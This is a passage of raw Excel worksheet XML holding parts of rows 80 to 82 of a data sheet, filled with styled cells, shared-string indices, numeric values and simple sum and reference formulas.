      <c r="KV80" s="127"/>
      <c r="KW80" s="127"/>
      <c r="KX80" s="127"/>
      <c r="KY80" s="127"/>
      <c r="KZ80" s="127"/>
      <c r="LA80" s="127"/>
      <c r="LB80" s="127"/>
      <c r="LC80" s="127"/>
      <c r="LD80" s="127"/>
      <c r="LE80" s="127"/>
      <c r="LF80" s="127"/>
      <c r="LG80" s="127"/>
      <c r="LH80" s="127"/>
      <c r="LI80" s="127"/>
      <c r="LJ80" s="127"/>
      <c r="LK80" s="127"/>
      <c r="LL80" s="127"/>
      <c r="LM80" s="127"/>
      <c r="LN80" s="127"/>
      <c r="LO80" s="127"/>
      <c r="LP80" s="127"/>
      <c r="LQ80" s="127"/>
      <c r="LR80" s="127"/>
      <c r="LS80" s="127"/>
      <c r="LT80" s="127"/>
      <c r="LU80" s="127"/>
      <c r="LV80" s="127"/>
      <c r="LW80" s="127"/>
      <c r="LX80" s="127"/>
      <c r="LY80" s="127"/>
      <c r="LZ80" s="127"/>
      <c r="MA80" s="127"/>
      <c r="MB80" s="127"/>
      <c r="MC80" s="127"/>
      <c r="MD80" s="127"/>
      <c r="ME80" s="127"/>
      <c r="MF80" s="127"/>
      <c r="MG80" s="127"/>
      <c r="MH80" s="127"/>
      <c r="MI80" s="127"/>
      <c r="MJ80" s="127"/>
      <c r="MK80" s="127"/>
      <c r="ML80" s="127"/>
      <c r="MM80" s="127"/>
      <c r="MN80" s="127"/>
      <c r="MO80" s="127"/>
      <c r="MP80" s="127"/>
      <c r="MQ80" s="127"/>
      <c r="MR80" s="127"/>
      <c r="MS80" s="127"/>
      <c r="MT80" s="127"/>
      <c r="MU80" s="127"/>
      <c r="MV80" s="127"/>
      <c r="MW80" s="127"/>
      <c r="MX80" s="127"/>
      <c r="MY80" s="127"/>
      <c r="MZ80" s="127"/>
      <c r="NA80" s="127"/>
      <c r="NB80" s="127"/>
      <c r="NC80" s="127"/>
      <c r="ND80" s="127"/>
      <c r="NE80" s="127"/>
      <c r="NF80" s="127"/>
      <c r="NG80" s="127"/>
      <c r="NH80" s="127"/>
      <c r="NI80" s="127"/>
      <c r="NJ80" s="127"/>
      <c r="NK80" s="127"/>
      <c r="NL80" s="127"/>
      <c r="NM80" s="127"/>
      <c r="NN80" s="127"/>
      <c r="NO80" s="127"/>
      <c r="NP80" s="127"/>
      <c r="NQ80" s="127"/>
      <c r="NR80" s="127"/>
      <c r="NS80" s="127"/>
      <c r="NT80" s="127"/>
      <c r="NU80" s="127"/>
      <c r="NV80" s="127"/>
      <c r="NW80" s="127"/>
      <c r="NX80" s="127"/>
      <c r="NY80" s="127"/>
    </row>
    <row r="81" ht="153.75" customHeight="1">
      <c r="B81" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C81" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D81" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E81" s="90" t="s">
        <v>1411</v>
      </c>
      <c r="F81" s="90" t="s">
        <v>1412</v>
      </c>
      <c r="G81" s="91" t="s">
        <v>1461</v>
      </c>
      <c r="H81" s="90" t="s">
        <v>1462</v>
      </c>
      <c r="I81" s="92" t="s">
        <v>1494</v>
      </c>
      <c r="J81" s="92" t="s">
        <v>1495</v>
      </c>
      <c r="K81" s="92" t="s">
        <v>1496</v>
      </c>
      <c r="L81" s="93" t="s">
        <v>1311</v>
      </c>
      <c r="M81" s="93">
        <v>1.0</v>
      </c>
      <c r="N81" s="93">
        <v>1.0</v>
      </c>
      <c r="O81" s="93">
        <v>0.0</v>
      </c>
      <c r="P81" s="93">
        <v>1.0</v>
      </c>
      <c r="Q81" s="93">
        <f>R81+S81</f>
        <v>1</v>
      </c>
      <c r="R81" s="93">
        <v>1.0</v>
      </c>
      <c r="S81" s="93">
        <v>0.0</v>
      </c>
      <c r="T81" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U81" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V81" s="96" t="s">
        <v>1497</v>
      </c>
      <c r="W81" s="96" t="s">
        <v>1498</v>
      </c>
      <c r="X81" s="97" t="s">
        <v>1499</v>
      </c>
      <c r="Y81" s="96" t="s">
        <v>1500</v>
      </c>
      <c r="Z81" s="126" t="s">
        <v>1467</v>
      </c>
      <c r="AA81" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB81" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC81" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD81" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE81" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF81" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG81" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH81" s="99" t="s">
        <v>1440</v>
      </c>
      <c r="AI81" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ81" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK81" s="100">
        <v>402.0</v>
      </c>
      <c r="AL81" s="100">
        <v>1.0</v>
      </c>
      <c r="AM81" s="100">
        <v>15.0</v>
      </c>
      <c r="AN81" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO81" s="100">
        <v>402.0</v>
      </c>
      <c r="AP81" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ81" s="100">
        <v>15.0</v>
      </c>
      <c r="AR81" s="100">
        <v>402.0</v>
      </c>
      <c r="AS81" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT81" s="100">
        <f t="shared" si="149"/>
        <v>402</v>
      </c>
      <c r="AU81" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV81" s="100">
        <v>402.0</v>
      </c>
      <c r="AW81" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX81" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY81" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ81" s="100">
        <v>0.0</v>
      </c>
      <c r="BA81" s="102">
        <v>60173.0</v>
      </c>
      <c r="BB81" s="102">
        <v>15.0</v>
      </c>
      <c r="BC81" s="102">
        <v>15.0</v>
      </c>
      <c r="BD81" s="102">
        <v>15.0</v>
      </c>
      <c r="BE81" s="102">
        <v>0.0</v>
      </c>
      <c r="BF81" s="102">
        <v>0.0</v>
      </c>
      <c r="BG81" s="102">
        <v>0.0</v>
      </c>
      <c r="BH81" s="102">
        <v>0.0</v>
      </c>
      <c r="BI81" s="102">
        <v>15.0</v>
      </c>
      <c r="BJ81" s="102">
        <v>15.0</v>
      </c>
      <c r="BK81" s="102">
        <v>15.0</v>
      </c>
      <c r="BL81" s="103">
        <f t="shared" si="112"/>
        <v>15</v>
      </c>
      <c r="BM81" s="103">
        <f t="shared" si="113"/>
        <v>15</v>
      </c>
      <c r="BN81" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO81" s="103">
        <f t="shared" si="115"/>
        <v>15</v>
      </c>
      <c r="BP81" s="103">
        <f t="shared" si="116"/>
        <v>15</v>
      </c>
      <c r="BQ81" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR81" s="103">
        <f t="shared" si="118"/>
        <v>15</v>
      </c>
      <c r="BS81" s="103">
        <f t="shared" si="119"/>
        <v>15</v>
      </c>
      <c r="BT81" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU81" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV81" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW81" s="104">
        <v>402.0</v>
      </c>
      <c r="BX81" s="104">
        <v>1.0</v>
      </c>
      <c r="BY81" s="104">
        <v>15.0</v>
      </c>
      <c r="BZ81" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA81" s="104">
        <v>402.0</v>
      </c>
      <c r="CB81" s="104">
        <v>1.0</v>
      </c>
      <c r="CC81" s="104">
        <v>15.0</v>
      </c>
      <c r="CD81" s="104">
        <v>402.0</v>
      </c>
      <c r="CE81" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF81" s="104">
        <f t="shared" si="153"/>
        <v>402</v>
      </c>
      <c r="CG81" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH81" s="104">
        <v>402.0</v>
      </c>
      <c r="CI81" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ81" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK81" s="104">
        <v>0.0</v>
      </c>
      <c r="CL81" s="104">
        <v>0.0</v>
      </c>
      <c r="CM81" s="105">
        <v>60172.0</v>
      </c>
      <c r="CN81" s="105">
        <v>15.0</v>
      </c>
      <c r="CO81" s="105">
        <v>15.0</v>
      </c>
      <c r="CP81" s="105">
        <v>15.0</v>
      </c>
      <c r="CQ81" s="105">
        <v>0.0</v>
      </c>
      <c r="CR81" s="105">
        <v>15.0</v>
      </c>
      <c r="CS81" s="105">
        <v>0.0</v>
      </c>
      <c r="CT81" s="105">
        <v>0.0</v>
      </c>
      <c r="CU81" s="105">
        <v>0.0</v>
      </c>
      <c r="CV81" s="105">
        <v>0.0</v>
      </c>
      <c r="CW81" s="105">
        <v>15.0</v>
      </c>
      <c r="CX81" s="105">
        <v>15.0</v>
      </c>
      <c r="CY81" s="105">
        <v>15.0</v>
      </c>
      <c r="CZ81" s="105">
        <v>0.0</v>
      </c>
      <c r="DA81" s="105">
        <v>15.0</v>
      </c>
      <c r="DB81" s="106">
        <f t="shared" si="122"/>
        <v>15</v>
      </c>
      <c r="DC81" s="106">
        <f t="shared" si="123"/>
        <v>15</v>
      </c>
      <c r="DD81" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE81" s="106">
        <f t="shared" si="125"/>
        <v>15</v>
      </c>
      <c r="DF81" s="106">
        <f t="shared" si="126"/>
        <v>15</v>
      </c>
      <c r="DG81" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH81" s="106">
        <f t="shared" si="127"/>
        <v>15</v>
      </c>
      <c r="DI81" s="106">
        <f t="shared" si="128"/>
        <v>15</v>
      </c>
      <c r="DJ81" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK81" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL81" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM81" s="108">
        <v>402.0</v>
      </c>
      <c r="DN81" s="108">
        <v>1.0</v>
      </c>
      <c r="DO81" s="108">
        <v>30.0</v>
      </c>
      <c r="DP81" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ81" s="108">
        <v>402.0</v>
      </c>
      <c r="DR81" s="108">
        <v>1.0</v>
      </c>
      <c r="DS81" s="108">
        <v>30.0</v>
      </c>
      <c r="DT81" s="108">
        <v>402.0</v>
      </c>
      <c r="DU81" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV81" s="108">
        <f t="shared" si="154"/>
        <v>402</v>
      </c>
      <c r="DW81" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX81" s="108">
        <v>402.0</v>
      </c>
      <c r="DY81" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ81" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA81" s="108">
        <v>0.0</v>
      </c>
      <c r="EB81" s="108">
        <v>0.0</v>
      </c>
      <c r="EC81" s="109">
        <v>60173.0</v>
      </c>
      <c r="ED81" s="109">
        <v>15.0</v>
      </c>
      <c r="EE81" s="109">
        <v>15.0</v>
      </c>
      <c r="EF81" s="109">
        <v>15.0</v>
      </c>
      <c r="EG81" s="109">
        <v>0.0</v>
      </c>
      <c r="EH81" s="109">
        <v>15.0</v>
      </c>
      <c r="EI81" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ81" s="109">
        <v>0.0</v>
      </c>
      <c r="EK81" s="109">
        <v>0.0</v>
      </c>
      <c r="EL81" s="109">
        <v>0.0</v>
      </c>
      <c r="EM81" s="109">
        <v>15.0</v>
      </c>
      <c r="EN81" s="109">
        <v>15.0</v>
      </c>
      <c r="EO81" s="109">
        <v>15.0</v>
      </c>
      <c r="EP81" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ81" s="109">
        <v>15.0</v>
      </c>
      <c r="ER81" s="110">
        <f t="shared" si="130"/>
        <v>15</v>
      </c>
      <c r="ES81" s="110">
        <f t="shared" si="131"/>
        <v>15</v>
      </c>
      <c r="ET81" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU81" s="110">
        <f t="shared" si="133"/>
        <v>15</v>
      </c>
      <c r="EV81" s="110">
        <f t="shared" si="134"/>
        <v>15</v>
      </c>
      <c r="EW81" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX81" s="110">
        <f t="shared" si="136"/>
        <v>15</v>
      </c>
      <c r="EY81" s="110">
        <f t="shared" si="137"/>
        <v>15</v>
      </c>
      <c r="EZ81" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA81" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB81" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC81" s="111" t="s">
        <v>1501</v>
      </c>
      <c r="FD81" s="111">
        <v>5.0</v>
      </c>
      <c r="FE81" s="111">
        <v>60221.0</v>
      </c>
      <c r="FF81" s="101" t="s">
        <v>1354</v>
      </c>
      <c r="FG81" s="111" t="s">
        <v>1502</v>
      </c>
      <c r="FH81" s="111">
        <v>2.0</v>
      </c>
      <c r="FI81" s="111">
        <v>60187.0</v>
      </c>
      <c r="FJ81" s="111" t="s">
        <v>1501</v>
      </c>
      <c r="FK81" s="111" t="s">
        <v>1354</v>
      </c>
      <c r="FL81" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2100525, 2002752, 2002749, 2100402, 402</v>
      </c>
      <c r="FM81" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN81" s="111" t="s">
        <v>1501</v>
      </c>
      <c r="FO81" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP81" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ81" s="111">
        <v>0.0</v>
      </c>
      <c r="FR81" s="111">
        <v>0.0</v>
      </c>
      <c r="FS81" s="112">
        <v>60172.0</v>
      </c>
      <c r="FT81" s="112">
        <v>60172.0</v>
      </c>
      <c r="FU81" s="112">
        <v>39447.0</v>
      </c>
      <c r="FV81" s="112">
        <v>15.0</v>
      </c>
      <c r="FW81" s="112">
        <v>60191.0</v>
      </c>
      <c r="FX81" s="112">
        <v>60206.0</v>
      </c>
      <c r="FY81" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ81" s="112">
        <v>0.0</v>
      </c>
      <c r="GA81" s="112">
        <v>0.0</v>
      </c>
      <c r="GB81" s="112">
        <v>0.0</v>
      </c>
      <c r="GC81" s="112">
        <v>60172.0</v>
      </c>
      <c r="GD81" s="112">
        <v>39447.0</v>
      </c>
      <c r="GE81" s="112">
        <v>15.0</v>
      </c>
      <c r="GF81" s="112">
        <v>60172.0</v>
      </c>
      <c r="GG81" s="112">
        <v>60187.0</v>
      </c>
      <c r="GH81" s="113">
        <f t="shared" si="139"/>
        <v>60172</v>
      </c>
      <c r="GI81" s="113">
        <f t="shared" si="140"/>
        <v>60172</v>
      </c>
      <c r="GJ81" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK81" s="113">
        <f t="shared" si="142"/>
        <v>39447</v>
      </c>
      <c r="GL81" s="113">
        <f t="shared" si="143"/>
        <v>39447</v>
      </c>
      <c r="GM81" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN81" s="113">
        <f t="shared" si="145"/>
        <v>60206</v>
      </c>
      <c r="GO81" s="113">
        <f t="shared" si="146"/>
        <v>60187</v>
      </c>
      <c r="GP81" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ81" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR81" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS81" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT81" s="94"/>
      <c r="GU81" s="116">
        <v>12525.0</v>
      </c>
      <c r="GV81" s="116">
        <v>1.0</v>
      </c>
      <c r="GW81" s="116">
        <v>32860.0</v>
      </c>
      <c r="GX81" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY81" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ81" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA81" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB81" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC81" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD81" s="131">
        <v>12525.0</v>
      </c>
      <c r="HE81" s="131">
        <v>12525.0</v>
      </c>
      <c r="HF81" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG81" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH81" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI81" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ81" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK81" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL81" s="93">
        <v>1.0</v>
      </c>
      <c r="HM81" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN81" s="93">
        <v>1.0</v>
      </c>
      <c r="HO81" s="93">
        <v>0.0</v>
      </c>
      <c r="HP81" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ81" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR81" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS81" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT81" s="139"/>
      <c r="HU81" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV81" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW81" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX81" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY81" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ81" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA81" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB81" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC81" s="120" t="str">
        <f t="shared" ref="IC81:IC91" si="156">HV81</f>
        <v>-</v>
      </c>
      <c r="ID81" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE81" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF81" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG81" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH81" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II81" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ81" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK81" s="99">
        <v>60172.0</v>
      </c>
      <c r="IL81" s="99">
        <v>0.0</v>
      </c>
      <c r="IM81" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN81" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO81" s="98">
        <v>0.0</v>
      </c>
      <c r="IP81" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ81" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR81" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS81" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT81" s="127"/>
      <c r="IU81" s="127"/>
      <c r="IV81" s="127"/>
      <c r="IW81" s="127"/>
      <c r="IX81" s="127"/>
      <c r="IY81" s="127"/>
      <c r="IZ81" s="127"/>
      <c r="JA81" s="127"/>
      <c r="JB81" s="127"/>
      <c r="JC81" s="127"/>
      <c r="JD81" s="127"/>
      <c r="JE81" s="127"/>
      <c r="JF81" s="127"/>
      <c r="JG81" s="127"/>
      <c r="JH81" s="127"/>
      <c r="JI81" s="127"/>
      <c r="JJ81" s="127"/>
      <c r="JK81" s="127"/>
      <c r="JL81" s="127"/>
      <c r="JM81" s="127"/>
      <c r="JN81" s="127"/>
      <c r="JO81" s="127"/>
      <c r="JP81" s="127"/>
      <c r="JQ81" s="127"/>
      <c r="JR81" s="127"/>
      <c r="JS81" s="127"/>
      <c r="JT81" s="127"/>
      <c r="JU81" s="127"/>
      <c r="JV81" s="127"/>
      <c r="JW81" s="127"/>
      <c r="JX81" s="127"/>
      <c r="JY81" s="127"/>
      <c r="JZ81" s="127"/>
      <c r="KA81" s="127"/>
      <c r="KB81" s="127"/>
      <c r="KC81" s="127"/>
      <c r="KD81" s="127"/>
      <c r="KE81" s="127"/>
      <c r="KF81" s="127"/>
      <c r="KG81" s="127"/>
      <c r="KH81" s="127"/>
      <c r="KI81" s="127"/>
      <c r="KJ81" s="127"/>
      <c r="KK81" s="127"/>
      <c r="KL81" s="127"/>
      <c r="KM81" s="127"/>
      <c r="KN81" s="127"/>
      <c r="KO81" s="127"/>
      <c r="KP81" s="127"/>
      <c r="KQ81" s="127"/>
      <c r="KR81" s="127"/>
      <c r="KS81" s="127"/>
      <c r="KT81" s="127"/>
      <c r="KU81" s="127"/>
      <c r="KV81" s="127"/>
      <c r="KW81" s="127"/>
      <c r="KX81" s="127"/>
      <c r="KY81" s="127"/>
      <c r="KZ81" s="127"/>
      <c r="LA81" s="127"/>
      <c r="LB81" s="127"/>
      <c r="LC81" s="127"/>
      <c r="LD81" s="127"/>
      <c r="LE81" s="127"/>
      <c r="LF81" s="127"/>
      <c r="LG81" s="127"/>
      <c r="LH81" s="127"/>
      <c r="LI81" s="127"/>
      <c r="LJ81" s="127"/>
      <c r="LK81" s="127"/>
      <c r="LL81" s="127"/>
      <c r="LM81" s="127"/>
      <c r="LN81" s="127"/>
      <c r="LO81" s="127"/>
      <c r="LP81" s="127"/>
      <c r="LQ81" s="127"/>
      <c r="LR81" s="127"/>
      <c r="LS81" s="127"/>
      <c r="LT81" s="127"/>
      <c r="LU81" s="127"/>
      <c r="LV81" s="127"/>
      <c r="LW81" s="127"/>
      <c r="LX81" s="127"/>
      <c r="LY81" s="127"/>
      <c r="LZ81" s="127"/>
      <c r="MA81" s="127"/>
      <c r="MB81" s="127"/>
      <c r="MC81" s="127"/>
      <c r="MD81" s="127"/>
      <c r="ME81" s="127"/>
      <c r="MF81" s="127"/>
      <c r="MG81" s="127"/>
      <c r="MH81" s="127"/>
      <c r="MI81" s="127"/>
      <c r="MJ81" s="127"/>
      <c r="MK81" s="127"/>
      <c r="ML81" s="127"/>
      <c r="MM81" s="127"/>
      <c r="MN81" s="127"/>
      <c r="MO81" s="127"/>
      <c r="MP81" s="127"/>
      <c r="MQ81" s="127"/>
      <c r="MR81" s="127"/>
      <c r="MS81" s="127"/>
      <c r="MT81" s="127"/>
      <c r="MU81" s="127"/>
      <c r="MV81" s="127"/>
      <c r="MW81" s="127"/>
      <c r="MX81" s="127"/>
      <c r="MY81" s="127"/>
      <c r="MZ81" s="127"/>
      <c r="NA81" s="127"/>
      <c r="NB81" s="127"/>
      <c r="NC81" s="127"/>
      <c r="ND81" s="127"/>
      <c r="NE81" s="127"/>
      <c r="NF81" s="127"/>
      <c r="NG81" s="127"/>
      <c r="NH81" s="127"/>
      <c r="NI81" s="127"/>
      <c r="NJ81" s="127"/>
      <c r="NK81" s="127"/>
      <c r="NL81" s="127"/>
      <c r="NM81" s="127"/>
      <c r="NN81" s="127"/>
      <c r="NO81" s="127"/>
      <c r="NP81" s="127"/>
      <c r="NQ81" s="127"/>
      <c r="NR81" s="127"/>
      <c r="NS81" s="127"/>
      <c r="NT81" s="127"/>
      <c r="NU81" s="127"/>
      <c r="NV81" s="127"/>
      <c r="NW81" s="127"/>
      <c r="NX81" s="127"/>
      <c r="NY81" s="127"/>
    </row>
    <row r="82" ht="153.75" customHeight="1">
      <c r="B82" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C82" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D82" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E82" s="90" t="s">
        <v>1411</v>
      </c>
      <c r="F82" s="90" t="s">
        <v>1412</v>
      </c>
      <c r="G82" s="91" t="s">
        <v>1461</v>
      </c>
      <c r="H82" s="90" t="s">
        <v>1462</v>
      </c>
      <c r="I82" s="92" t="s">
        <v>1494</v>
      </c>
      <c r="J82" s="92" t="s">
        <v>508</v>
      </c>
      <c r="K82" s="92" t="s">
        <v>1503</v>
      </c>
      <c r="L82" s="93" t="s">
        <v>1311</v>
      </c>
      <c r="M82" s="93">
        <v>1.0</v>
      </c>
      <c r="N82" s="93">
        <v>1.0</v>
      </c>
      <c r="O82" s="93">
        <v>0.0</v>
      </c>
      <c r="P82" s="93">
        <v>1.0</v>
      </c>
      <c r="Q82" s="93">
        <v>1.0</v>
      </c>
      <c r="R82" s="93">
        <v>1.0</v>
      </c>
      <c r="S82" s="93">
        <v>0.0</v>
      </c>
      <c r="T82" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U82" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V82" s="96" t="s">
        <v>1497</v>
      </c>
      <c r="W82" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X82" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y82" s="126" t="s">
        <v>1504</v>
      </c>
      <c r="Z82" s="126" t="s">
        <v>1467</v>
      </c>
      <c r="AA82" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB82" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC82" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD82" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE82" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF82" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG82" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH82" s="99" t="s">
        <v>1440</v>
      </c>
      <c r="AI82" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ82" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK82" s="100">
        <v>402.0</v>
      </c>
      <c r="AL82" s="100">
        <v>1.0</v>
      </c>
      <c r="AM82" s="100">
        <v>5278.0</v>
      </c>
      <c r="AN82" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO82" s="100">
        <v>402.0</v>
      </c>
      <c r="AP82" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ82" s="100">
        <v>5278.0</v>
      </c>
      <c r="AR82" s="100">
        <v>402.0</v>
      </c>
      <c r="AS82" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT82" s="100">
        <f t="shared" si="149"/>
        <v>402</v>
      </c>
      <c r="AU82" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV82" s="100">
        <v>402.0</v>
      </c>
      <c r="AW82" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX82" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY82" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ82" s="100">
        <v>0.0</v>
      </c>
      <c r="BA82" s="102">
        <v>110.0</v>
      </c>
      <c r="BB82" s="102">
        <v>100.0</v>
      </c>
      <c r="BC82" s="102">
        <v>5083.0</v>
      </c>
      <c r="BD82" s="102">
        <v>5278.0</v>
      </c>
      <c r="BE82" s="102">
        <v>0.0</v>
      </c>
      <c r="BF82" s="102">
        <v>0.0</v>
      </c>
      <c r="BG82" s="102">
        <v>0.0</v>
      </c>
      <c r="BH82" s="102">
        <v>0.0</v>
      </c>
      <c r="BI82" s="102">
        <v>100.0</v>
      </c>
      <c r="BJ82" s="102">
        <v>5083.0</v>
      </c>
      <c r="BK82" s="102">
        <v>5278.0</v>
      </c>
      <c r="BL82" s="103">
        <f t="shared" si="112"/>
        <v>100</v>
      </c>
      <c r="BM82" s="103">
        <f t="shared" si="113"/>
        <v>100</v>
      </c>
      <c r="BN82" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO82" s="103">
        <f t="shared" si="115"/>
        <v>5083</v>
      </c>
      <c r="BP82" s="103">
        <f t="shared" si="116"/>
        <v>5083</v>
      </c>
      <c r="BQ82" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR82" s="103">
        <f t="shared" si="118"/>
        <v>5278</v>
      </c>
      <c r="BS82" s="103">
        <f t="shared" si="119"/>
        <v>5278</v>
      </c>
      <c r="BT82" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU82" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV82" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW82" s="104">
        <v>402.0</v>
      </c>
      <c r="BX82" s="104">
        <v>1.0</v>
      </c>
      <c r="BY82" s="104">
        <v>5278.0</v>
      </c>
      <c r="BZ82" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA82" s="104">
        <v>402.0</v>
      </c>
      <c r="CB82" s="104">
        <v>1.0</v>
      </c>
      <c r="CC82" s="104">
        <v>5278.0</v>
      </c>
      <c r="CD82" s="104">
        <v>402.0</v>
      </c>
      <c r="CE82" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF82" s="104">
        <f t="shared" si="153"/>
        <v>402</v>
      </c>
      <c r="CG82" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH82" s="104">
        <v>402.0</v>
      </c>
      <c r="CI82" s="104" t="s">
        <v>12</v>
      </c>
